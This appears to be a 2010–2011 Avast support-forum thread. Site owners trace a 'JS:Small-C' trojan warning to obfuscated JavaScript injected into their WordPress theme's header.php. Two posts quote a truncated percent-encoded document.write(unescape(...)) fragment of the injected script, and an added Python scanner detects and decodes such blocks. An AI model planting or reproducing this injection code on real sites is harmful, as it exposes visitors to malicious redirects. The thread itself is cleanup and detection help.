Author Topic: JS:Small malware and can't find it?

Francois_Dumas

  • Guest
JS:Small malware and can't find it?
« on: February 03, 2010, 11:53:42 AM »
Today I signed up for Commission Junction to add an affiliate program on my website, and the next thing I know (BEFORE adding any code to the site) I am getting an Avast warning about 'JS:Small-C [Trj]' being found and blocked.

The website is www.europerides.com and the index file points to a folder containing a Wordpress blog.

I have been looking at the html of the blog pages and can't find anything. Nothing was wrong before today; I did not change anything except for the last post, which I entered on Jan 31st.

I am wondering if it is a false positive, caused by my relationship with Commission Junction ??? If not, how can I find the offending code.. and how could it have entered my blog???
I am a 30+ year computer freak and never click on silly things or visit strange shops, porn sites, torrents etc.

I am baffled !

Francois

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37529
  • Not a avast user

Francois_Dumas

  • Guest
Re: JS:Small malware and can't find it?
« Reply #2 on: February 03, 2010, 12:15:35 PM »
Thanks for the reply Pondus. Yes, I saw that too. But I still get the warning when accessing it normally.

However, I have narrowed it down to the Wordpress Theme I was using (and have been using for many years).
I now changed the theme and the warning is gone ! So I suspect it is a false positive triggered by something specific to that WP theme!

Offline Pondus

Re: JS:Small malware and can't find it?
« Reply #3 on: February 03, 2010, 12:48:18 PM »
It is a bug written in JavaScript, if real.

Could not find JS:Small-C but found this JS.Small.dz
http://www.viruslist.com/en/viruses/encyclopedia?virusid=152469

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33900
  • malware fighter
Re: JS:Small malware and can't find it?
« Reply #4 on: February 03, 2010, 03:50:30 PM »
Hi Francois_Dumas,

What to do?
Empty the temporary java cache. [Located in the java console].
Here are the instructions on how to manually remove these malicious applets from the JRE cache directory:

From the Start button, click Settings > Control Panel
In the Control Panel, open the "Java Plug-in Control Panel"
Select the Cache Tab
Click the Clear button inside the Cache Tab, which will clear your JRE cache directory
pictures: http://www.dslreports.com/forum/remark,13803204

To verify the current version of Java installed, use this tool: www.java.com/en/download/installed.jsp

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

mentalist3d

  • Guest
Re: JS:Small malware and can't find it?
« Reply #5 on: February 04, 2010, 07:29:00 PM »
I had a friend phone me today; the same was happening with their own site running an outdated version of WordPress. My PC kept blocking the site, so I checked on the Mac and within seconds I was redirected to a Chinese site for a sex museum. To do an initial clear of the problem, I went to edit the WordPress templates, and within the file header.php there was additional coding that had been obscured. I found the code after the tags:
Code:
<?php wp_head(); ?></head>
Look for the code:
Code:
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%, just delete this extra code and that should provide a quick temporary fix.

LeanneBoyd

  • Guest
Re: JS:Small malware and can't find it?
« Reply #6 on: February 06, 2010, 08:46:39 PM »
My blog got hacked today (or in recent 2 days since I've been up there) with this. I found this forum by googling the Malware name - JS:Small-C [Trj]

I tried what mentalist3d suggested and sure enough, I quit getting the Avast alert, so that fixed that.

I am curious.... you said this was a temporary fix? What needs to be done for a permanent fix? I am going to upgrade Wordpress to 2.9.1, as I am still at 2.8.4. And I'm going to change my admin password. However, none of this happened behind the scenes in Dashboard etc. Just on the main site. How on earth did "they" manage to change/add coding in the header.php? Obviously this WAS a hack of the Admin area, to write to the header.php.

Thanks!
Leanne

a P.S. added: Also wanted to note that taking the coding out ALSO "hit" all of my Adsense!!!! I'm getting the generic search box ONLY, at the top. And the sidebar Adsense is back to community service ads.
« Last Edit: February 06, 2010, 08:56:03 PM by LeanneBoyd »

mentalist3d

  • Guest
Re: JS:Small malware and can't find it?
« Reply #7 on: February 06, 2010, 09:35:25 PM »
I don't know enough about WordPress to know how it was done, but I reckon there must be a bug in older versions that can be exploited. Keeping WordPress upgraded to the latest versions usually keeps your site secure, as all the latest bugs and weaknesses are fixed.

computerfreaker

  • Guest
Re: JS:Small malware and can't find it?
« Reply #8 on: February 06, 2010, 10:05:00 PM »
Quote from: mentalist3d
I had a friend phone me today; the same was happening with their own site running an outdated version of WordPress. My PC kept blocking the site, so I checked on the Mac and within seconds I was redirected to a Chinese site for a sex museum. To do an initial clear of the problem, I went to edit the WordPress templates, and within the file header.php there was additional coding that had been obscured. I found the code after the tags:
Code:
<?php wp_head(); ?></head>
Look for the code:
Code:
<script language=javascript>document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%, just delete this extra code and that should provide a quick temporary fix.
Could you post the rest of that JavaScript on pastebin, then post the pastebin link here?
I just tried de-obfuscating the JavaScript, but you only included part of it - most, including the payload, is missing.

Thanks!

LeanneBoyd

  • Guest
Re: JS:Small malware and can't find it?
« Reply #9 on: February 06, 2010, 10:09:51 PM »
 ;D

mentalist3d....

I just came here to update my post, and found yours! YES! Now... there have been reasons I've not updated since 2.8.4! But it's been on my ToDo list now for about a week. And this trojan just sped things up!

I just upgraded to 2.9.1, and it was flawless, per usual (I worry too much I guess... so I just backed up, held my breath, and dove in! Silly me, it took about 7 seconds to update and so far, so good)

And other than the trojan STILL not being back.... the upgrade also brought my Adsense back to normal!

my blog: http://www.1webdiva.com/blog/

Thanks for all the help here in this forum.

LeanneBoyd

  • Guest
Re: JS:Small malware and can't find it?
« Reply #10 on: February 06, 2010, 10:21:03 PM »

Quote from: computerfreaker
Could you post the rest of that JavaScript on pastebin, then post the pastebin link here?
I just tried de-obfuscating the JavaScript, but you only included part of it - most, including the payload, is missing.

Thanks!

I went to the Editor in my blog and chose header.php, as that's where he said it would be found. I scrolled down to look for the coding, as yes, I noticed it was only partially given (good move though! without the whole thing posted here, nobody could take it and begin to try and play nasty games with somebody else's site!)

YOU CAN'T MISS IT. It was about 1/3 of the way down the file, and the coding is SO blatantly apparent from all normal coding. Take it from the < script> to the </ script> and just zap it out. FIRST, I did a select-all, and copied the entire header.php to Notepad, just in case. But delete that coding, hit save.

You may find that it screws with AdSense (and perhaps other things, but frankly I didn't look... AdSense is just so apparent, it was the first thing I noticed, being 'altered' - but upgrading to WP 2.9.1 fixed it all)

Make your backup copy, and zap that coding. You sure don't want to leave it there. PC, WP, just parts and pieces; they don't bite!

Good luck
Leanne
my blog: http://www.1webdiva.com/blog/
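
Added example (not part of any post in this thread): a Python scan for the kind of injected `document.write(unescape('%3C...'))` block described above, run over every theme file rather than header.php alone, decoding only the first layer so it can be read in plain text. The threshold, the file suffixes and the sample header.php are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import unquote

# Assumed threshold: flag a quoted unescape() argument with this many %XX escapes.
MIN_ESCAPES = 8
CALL = re.compile(r"""unescape\(\s*['"]([^'"]*)['"]""")
ESCAPE = re.compile(r"%[0-9A-Fa-f]{2}")

def scan_text(text):
    """Return (line_number, first_layer_decoded) per suspicious unescape() call."""
    hits = []
    for m in CALL.finditer(text):
        if len(ESCAPE.findall(m.group(1))) >= MIN_ESCAPES:
            line = text.count("\n", 0, m.start()) + 1
            # JavaScript unescape() maps %XX to Latin-1; %uXXXX is left as-is here.
            hits.append((line, unquote(m.group(1), encoding="latin-1")))
    return hits

def scan_tree(root, suffixes=(".php", ".js", ".html")):
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            findings += [(path.name, ln, dec[:80]) for ln, dec in scan_text(text)]
    return findings

# Constructed sample: a harmless string encoded the same way, placed after wp_head().
HARMLESS = "<b>constructed sample, not the real payload</b>"
SAMPLE_HEADER = (
    "<html><head>\n<title><?php bloginfo('name'); ?></title>\n"
    "<?php wp_head(); ?></head>\n"
    "<script language=javascript>document.write(unescape('"
    + "".join("%%%02X" % ord(c) for c in HARMLESS)
    + "'));</script>\n<body>\n"
)

def demo():
    with tempfile.TemporaryDirectory() as d:
        theme = Path(d) / "wp-content" / "themes" / "example-theme"
        theme.mkdir(parents=True)
        (theme / "header.php").write_text(SAMPLE_HEADER, encoding="utf-8")
        (theme / "footer.php").write_text("<?php wp_footer(); ?>\n", encoding="utf-8")
        return scan_tree(d)

if __name__ == "__main__":
    for name, line, decoded in demo():
        print(f"{name}:{line}: {decoded}")
```

Run `scan_tree` against a downloaded copy of the site's wp-content directory; each hit gives the file and line to inspect by hand.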

profitweaver

  • Guest
Re: JS:Small malware and can't find it?
« Reply #11 on: February 08, 2010, 10:27:33 AM »
Quote from: mentalist3d
I had a friend phone me today; the same was happening with their own site running an outdated version of WordPress. My PC kept blocking the site, so I checked on the Mac and within seconds I was redirected to a Chinese site for a sex museum. To do an initial clear of the problem, I went to edit the WordPress templates, and within the file header.php there was additional coding that had been obscured. I found the code after the tags:
Code:
***removed***, just delete this extra code and that should provide a quick temporary fix.

Thanks for this. I couldn't understand why this was occurring, but I have been hacked as well!
« Last Edit: March 01, 2011, 09:27:30 AM by igor »

danny2001s

  • Guest
Re: JS:Small malware and can't find it?
« Reply #12 on: March 01, 2011, 02:16:55 AM »
I have the same problem and can't find the code on my site; the blog uses WordPress. After updating, it's the same issue: Avast still finds "JS:Small-C" and I can't find it.

Can you please help? http://www.tecno-soft.com/blog/

Offline Pondus

Re: JS:Small malware and can't find it?
« Reply #13 on: March 01, 2011, 02:42:11 AM »
Please edit your post and remove the code..
Do not post malware code in the forum as it will be detected by those entering the forum...

Virscan - your code
http://virscan.org/report/8b281ef0b58bb83825dfdb1d8cbed723.html